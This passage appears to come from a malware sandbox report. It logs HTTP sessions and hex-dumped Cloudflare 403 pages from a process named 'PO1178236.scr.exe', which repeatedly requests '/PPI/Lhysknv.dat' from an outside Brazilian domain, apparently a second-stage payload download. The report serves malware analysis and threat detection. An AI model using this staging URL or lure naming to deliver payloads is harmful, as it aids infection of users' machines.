        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:07 UTC1369INData Raw: 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64
        Data Ascii: itle><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-wid
        2025-01-09 07:36:07 UTC1369INData Raw: 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70 74 63 68 61 2d 63 6f 6e
        Data Ascii: light"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captcha-con
        2025-01-09 07:36:07 UTC1369INData Raw: 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 32 36 66 61 37 61 34 33 66 33 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b
        Data Ascii: rder-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c126fa7a43f3</strong></span> <span class="cf-footer-separator sm:hidden">&bull;
        2025-01-09 07:36:07 UTC992INData Raw: 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 32 36 66 61 37 61 34 33 66 33 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 32 4e 79 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61 3d 64 6f 63 75 6d
        Data Ascii: _translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c126fa7a43f3',t:'MTczNjQwODE2Ny4wMDAwMDA='};var a=docum
        2025-01-09 07:36:07 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        19192.168.2.949726188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:08 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:08 UTC1003INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:08 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:23 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WN5VLDjgXfjnTw0n1%2FuiCU3Px1p0LPtAoEpcQheRZCACXod4kVS6A3w5mX5sfn2tk5y02jIfb5QHohJNms0w%2BMHcqK2P9ZZKSeQEx5ncAYtlgP5GezvWiXWDF8xulRSZZeOAQbL7YnqzAZNS"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c12aba341921-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1681&min_rtt=1678&rtt_var=635&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1713615&cwnd=139&unsent_bytes=0&cid=eda50b4132c06cf1&ts=145&x=0"
        2025-01-09 07:36:08 UTC366INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:08 UTC1369INData Raw: 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65
        Data Ascii: e</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device
        2025-01-09 07:36:08 UTC1369INData Raw: 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70 74 63 68 61
        Data Ascii: highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captcha
        2025-01-09 07:36:08 UTC1369INData Raw: 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 32 61 62 61 33 34 31 39 32 31 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62
        Data Ascii: t border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c12aba341921</strong></span> <span class="cf-footer-separator sm:hidden">&b
        2025-01-09 07:36:08 UTC996INData Raw: 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 32 61 62 61 33 34 31 39 32 31 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 32 4f 43 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61 3d 64
        Data Ascii: ._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c12aba341921',t:'MTczNjQwODE2OC4wMDAwMDA='};var a=d
        2025-01-09 07:36:08 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        20192.168.2.949727188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:08 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:08 UTC1011INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:08 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:23 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kcRH8vGoCnjUYJ0vEls4pBB2EcM%2BwV%2BF%2FLo52W24I8Vm4o5q4Pdoz5tVWorRJhtywlcuia3cFNF7Tu%2FxROrNsIGcCnvQdPLxOIDgg%2BGWtHxMyk3%2BNe2hAlTQU3zVUO9Qlj6XiZdiC97gEsw5"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c12e7c4bc42c-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1667&min_rtt=1661&rtt_var=636&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1701631&cwnd=232&unsent_bytes=0&cid=10a02c7287ca6b0a&ts=130&x=0"
        2025-01-09 07:36:08 UTC358INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:08 UTC1369INData Raw: 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74
        Data Ascii: loudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="widt
        2025-01-09 07:36:08 UTC1369INData Raw: 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f
        Data Ascii: tion cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /
        2025-01-09 07:36:08 UTC1369INData Raw: 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 32 65 37 63 34 62 63 34 32 63 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69
        Data Ascii: text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c12e7c4bc42c</strong></span> <span class="cf-footer-separator sm:hi
        2025-01-09 07:36:08 UTC1004INData Raw: 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 32 65 37 63 34 62 63 34 32 63 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 32 4f 43 34 77 4d 44 41 77 4d 44 41 3d 27 7d
        Data Ascii: window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c12e7c4bc42c',t:'MTczNjQwODE2OC4wMDAwMDA='}
        2025-01-09 07:36:08 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        21192.168.2.949728188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:09 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:09 UTC1011INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:09 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:24 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XIgPt25IgUST1ih%2BMZo2piXViKBtg1CUe9Donig%2BQ1IW8%2FZ9YU7HXTlYdklo6Ov80ImiUsIXY05JDyd6Nojk9XCiB%2BQP6HDw7dknY%2FtGlPwbpyJ%2BiIrANqv89VyEy4e1YbBjDKtL3KLUnY7e"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c1326bcb8c41-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=2036&min_rtt=1975&rtt_var=784&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1478481&cwnd=225&unsent_bytes=0&cid=1daa1e4d7e085201&ts=156&x=0"
        2025-01-09 07:36:09 UTC358INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:09 UTC1369INData Raw: 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74
        Data Ascii: loudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="widt
